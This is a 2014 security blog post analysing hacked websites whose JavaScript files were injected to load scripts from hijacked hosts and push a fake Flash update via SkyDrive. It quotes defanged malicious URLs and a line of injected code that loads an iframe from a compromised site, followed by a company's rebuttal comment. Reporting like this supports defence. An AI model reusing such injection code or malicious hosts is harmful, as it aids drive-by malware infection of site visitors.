Sponsored by..

Thursday, 16 January 2014

Ongoing Fake flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:

What has happened is that somehow an attacker has altered several .js files on the victim's site and has appened extra code. In this case the code has been appened to [donotclick]www.physiomedicor.de/assets/rollover.js  as follows (click to enlarge):

In this case the code injected tries to load a script from a hijacked site [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336 but this isn't the first time that I've seen this format of URL injected into a script today as I've seen these other two (also using hijacked sites) as well:


This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:
document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';
..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:
    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');

The adscendmedia.com link contains an aff=8663 affiliate ID which indicates that some other party other than Adscend Media LLC may be responsible. This link comes up black when I try to follow it, which might mean a number of things (even the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:
..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.


Fehzan Ali said...
This comment has been removed by the author.
Fehzan Ali said...


My name is Fehzan Ali, with Adscend Media. This publisher was suspended from our network for illegal activity in October 2013. He was caught and quickly banned by our compliance manager. Further, our JS code is being used maliciously and has no tie in to us. Our lawsuits from 2012 were quickly solved in months time.

See below:

Your comments are without merit. We have over 21,000 publishers signed up to use our services amd a compliance manager to police the use of our services. We educate our publishers and stand at the front of compliance. I'd like to ask you to modify some of your statements accordingly given this information.

If you have any questions, feel free to contact me directly at fehzan [at] adscendmedia [dot] com. Thank you.